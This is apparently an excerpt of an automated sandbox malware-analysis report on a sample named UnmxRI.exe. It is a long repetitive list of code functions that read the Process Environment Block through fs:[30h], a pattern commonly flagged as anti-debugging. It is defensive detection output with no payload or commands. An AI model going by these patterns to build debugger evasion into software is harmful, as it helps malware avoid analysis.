                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018980A0 mov eax, dword ptr fs:[00000030h]9_2_018980A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019660B8 mov eax, dword ptr fs:[00000030h]9_2_019660B8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019660B8 mov ecx, dword ptr fs:[00000030h]9_2_019660B8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019380A8 mov eax, dword ptr fs:[00000030h]9_2_019380A8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019220DE mov eax, dword ptr fs:[00000030h]9_2_019220DE
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A80E9 mov eax, dword ptr fs:[00000030h]9_2_018A80E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189A0E3 mov ecx, dword ptr fs:[00000030h]9_2_0189A0E3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019260E0 mov eax, dword ptr fs:[00000030h]9_2_019260E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189C0F0 mov eax, dword ptr fs:[00000030h]9_2_0189C0F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E20F0 mov ecx, dword ptr fs:[00000030h]9_2_018E20F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01924000 mov ecx, dword ptr fs:[00000030h]9_2_01924000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01942000 mov eax, dword ptr fs:[00000030h]9_2_01942000
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE016 mov eax, dword ptr fs:[00000030h]9_2_018BE016
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE016 mov eax, dword ptr fs:[00000030h]9_2_018BE016
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE016 mov eax, dword ptr fs:[00000030h]9_2_018BE016
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE016 mov eax, dword ptr fs:[00000030h]9_2_018BE016
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936030 mov eax, dword ptr fs:[00000030h]9_2_01936030
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189A020 mov eax, dword ptr fs:[00000030h]9_2_0189A020
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189C020 mov eax, dword ptr fs:[00000030h]9_2_0189C020
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926050 mov eax, dword ptr fs:[00000030h]9_2_01926050
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A2050 mov eax, dword ptr fs:[00000030h]9_2_018A2050
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CC073 mov eax, dword ptr fs:[00000030h]9_2_018CC073
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E388 mov eax, dword ptr fs:[00000030h]9_2_0189E388
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E388 mov eax, dword ptr fs:[00000030h]9_2_0189E388
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E388 mov eax, dword ptr fs:[00000030h]9_2_0189E388
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C438F mov eax, dword ptr fs:[00000030h]9_2_018C438F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C438F mov eax, dword ptr fs:[00000030h]9_2_018C438F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898397 mov eax, dword ptr fs:[00000030h]9_2_01898397
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898397 mov eax, dword ptr fs:[00000030h]9_2_01898397
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01898397 mov eax, dword ptr fs:[00000030h]9_2_01898397
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019443D4 mov eax, dword ptr fs:[00000030h]9_2_019443D4
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019443D4 mov eax, dword ptr fs:[00000030h]9_2_019443D4
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA3C0 mov eax, dword ptr fs:[00000030h]9_2_018AA3C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA3C0 mov eax, dword ptr fs:[00000030h]9_2_018AA3C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA3C0 mov eax, dword ptr fs:[00000030h]9_2_018AA3C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA3C0 mov eax, dword ptr fs:[00000030h]9_2_018AA3C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA3C0 mov eax, dword ptr fs:[00000030h]9_2_018AA3C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA3C0 mov eax, dword ptr fs:[00000030h]9_2_018AA3C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A83C0 mov eax, dword ptr fs:[00000030h]9_2_018A83C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A83C0 mov eax, dword ptr fs:[00000030h]9_2_018A83C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A83C0 mov eax, dword ptr fs:[00000030h]9_2_018A83C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A83C0 mov eax, dword ptr fs:[00000030h]9_2_018A83C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E3DB mov eax, dword ptr fs:[00000030h]9_2_0194E3DB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E3DB mov eax, dword ptr fs:[00000030h]9_2_0194E3DB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E3DB mov ecx, dword ptr fs:[00000030h]9_2_0194E3DB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E3DB mov eax, dword ptr fs:[00000030h]9_2_0194E3DB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019263C0 mov eax, dword ptr fs:[00000030h]9_2_019263C0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195C3CD mov eax, dword ptr fs:[00000030h]9_2_0195C3CD
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B03E9 mov eax, dword ptr fs:[00000030h]9_2_018B03E9
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D63FF mov eax, dword ptr fs:[00000030h]9_2_018D63FF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE3F0 mov eax, dword ptr fs:[00000030h]9_2_018BE3F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE3F0 mov eax, dword ptr fs:[00000030h]9_2_018BE3F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018BE3F0 mov eax, dword ptr fs:[00000030h]9_2_018BE3F0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA30B mov eax, dword ptr fs:[00000030h]9_2_018DA30B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA30B mov eax, dword ptr fs:[00000030h]9_2_018DA30B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA30B mov eax, dword ptr fs:[00000030h]9_2_018DA30B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189C310 mov ecx, dword ptr fs:[00000030h]9_2_0189C310
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C0310 mov ecx, dword ptr fs:[00000030h]9_2_018C0310
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01978324 mov eax, dword ptr fs:[00000030h]9_2_01978324
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01978324 mov ecx, dword ptr fs:[00000030h]9_2_01978324
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01978324 mov eax, dword ptr fs:[00000030h]9_2_01978324
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01978324 mov eax, dword ptr fs:[00000030h]9_2_01978324
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0196A352 mov eax, dword ptr fs:[00000030h]9_2_0196A352
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01948350 mov ecx, dword ptr fs:[00000030h]9_2_01948350
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]9_2_0192035C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]9_2_0192035C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]9_2_0192035C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192035C mov ecx, dword ptr fs:[00000030h]9_2_0192035C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]9_2_0192035C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192035C mov eax, dword ptr fs:[00000030h]9_2_0192035C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0197634F mov eax, dword ptr fs:[00000030h]9_2_0197634F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01922349 mov eax, dword ptr fs:[00000030h]9_2_01922349
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194437C mov eax, dword ptr fs:[00000030h]9_2_0194437C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE284 mov eax, dword ptr fs:[00000030h]9_2_018DE284
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE284 mov eax, dword ptr fs:[00000030h]9_2_018DE284
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01920283 mov eax, dword ptr fs:[00000030h]9_2_01920283
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01920283 mov eax, dword ptr fs:[00000030h]9_2_01920283
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01920283 mov eax, dword ptr fs:[00000030h]9_2_01920283
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B02A0 mov eax, dword ptr fs:[00000030h]9_2_018B02A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B02A0 mov eax, dword ptr fs:[00000030h]9_2_018B02A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019362A0 mov eax, dword ptr fs:[00000030h]9_2_019362A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019362A0 mov ecx, dword ptr fs:[00000030h]9_2_019362A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019362A0 mov eax, dword ptr fs:[00000030h]9_2_019362A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019362A0 mov eax, dword ptr fs:[00000030h]9_2_019362A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019362A0 mov eax, dword ptr fs:[00000030h]9_2_019362A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019362A0 mov eax, dword ptr fs:[00000030h]9_2_019362A0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019762D6 mov eax, dword ptr fs:[00000030h]9_2_019762D6
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA2C3 mov eax, dword ptr fs:[00000030h]9_2_018AA2C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA2C3 mov eax, dword ptr fs:[00000030h]9_2_018AA2C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA2C3 mov eax, dword ptr fs:[00000030h]9_2_018AA2C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA2C3 mov eax, dword ptr fs:[00000030h]9_2_018AA2C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018AA2C3 mov eax, dword ptr fs:[00000030h]9_2_018AA2C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B02E1 mov eax, dword ptr fs:[00000030h]9_2_018B02E1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B02E1 mov eax, dword ptr fs:[00000030h]9_2_018B02E1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B02E1 mov eax, dword ptr fs:[00000030h]9_2_018B02E1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189823B mov eax, dword ptr fs:[00000030h]9_2_0189823B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195A250 mov eax, dword ptr fs:[00000030h]9_2_0195A250
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195A250 mov eax, dword ptr fs:[00000030h]9_2_0195A250
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0197625D mov eax, dword ptr fs:[00000030h]9_2_0197625D
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01928243 mov eax, dword ptr fs:[00000030h]9_2_01928243
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01928243 mov ecx, dword ptr fs:[00000030h]9_2_01928243
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A6259 mov eax, dword ptr fs:[00000030h]9_2_018A6259
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189A250 mov eax, dword ptr fs:[00000030h]9_2_0189A250
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01950274 mov eax, dword ptr fs:[00000030h]9_2_01950274
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189826B mov eax, dword ptr fs:[00000030h]9_2_0189826B
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4260 mov eax, dword ptr fs:[00000030h]9_2_018A4260
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4260 mov eax, dword ptr fs:[00000030h]9_2_018A4260
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A4260 mov eax, dword ptr fs:[00000030h]9_2_018A4260
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D4588 mov eax, dword ptr fs:[00000030h]9_2_018D4588
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A2582 mov eax, dword ptr fs:[00000030h]9_2_018A2582
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A2582 mov ecx, dword ptr fs:[00000030h]9_2_018A2582
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE59C mov eax, dword ptr fs:[00000030h]9_2_018DE59C
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019205A7 mov eax, dword ptr fs:[00000030h]9_2_019205A7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019205A7 mov eax, dword ptr fs:[00000030h]9_2_019205A7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019205A7 mov eax, dword ptr fs:[00000030h]9_2_019205A7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C45B1 mov eax, dword ptr fs:[00000030h]9_2_018C45B1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018C45B1 mov eax, dword ptr fs:[00000030h]9_2_018C45B1
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE5CF mov eax, dword ptr fs:[00000030h]9_2_018DE5CF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DE5CF mov eax, dword ptr fs:[00000030h]9_2_018DE5CF
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A65D0 mov eax, dword ptr fs:[00000030h]9_2_018A65D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA5D0 mov eax, dword ptr fs:[00000030h]9_2_018DA5D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA5D0 mov eax, dword ptr fs:[00000030h]9_2_018DA5D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC5ED mov eax, dword ptr fs:[00000030h]9_2_018DC5ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DC5ED mov eax, dword ptr fs:[00000030h]9_2_018DC5ED
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A25E0 mov eax, dword ptr fs:[00000030h]9_2_018A25E0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE5E7 mov eax, dword ptr fs:[00000030h]9_2_018CE5E7
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01936500 mov eax, dword ptr fs:[00000030h]9_2_01936500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974500 mov eax, dword ptr fs:[00000030h]9_2_01974500
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018CE53E mov eax, dword ptr fs:[00000030h]9_2_018CE53E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018B0535 mov eax, dword ptr fs:[00000030h]9_2_018B0535
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8550 mov eax, dword ptr fs:[00000030h]9_2_018A8550
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A8550 mov eax, dword ptr fs:[00000030h]9_2_018A8550
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D656A mov eax, dword ptr fs:[00000030h]9_2_018D656A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D656A mov eax, dword ptr fs:[00000030h]9_2_018D656A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D656A mov eax, dword ptr fs:[00000030h]9_2_018D656A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195A49A mov eax, dword ptr fs:[00000030h]9_2_0195A49A
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A64AB mov eax, dword ptr fs:[00000030h]9_2_018A64AB
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192A4B0 mov eax, dword ptr fs:[00000030h]9_2_0192A4B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D44B0 mov ecx, dword ptr fs:[00000030h]9_2_018D44B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A04E5 mov ecx, dword ptr fs:[00000030h]9_2_018A04E5
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8402 mov eax, dword ptr fs:[00000030h]9_2_018D8402
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8402 mov eax, dword ptr fs:[00000030h]9_2_018D8402
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D8402 mov eax, dword ptr fs:[00000030h]9_2_018D8402
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E420 mov eax, dword ptr fs:[00000030h]9_2_0189E420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E420 mov eax, dword ptr fs:[00000030h]9_2_0189E420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189E420 mov eax, dword ptr fs:[00000030h]9_2_0189E420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189C427 mov eax, dword ptr fs:[00000030h]9_2_0189C427
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01926420 mov eax, dword ptr fs:[00000030h]9_2_01926420
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018DA430 mov eax, dword ptr fs:[00000030h]9_2_018DA430
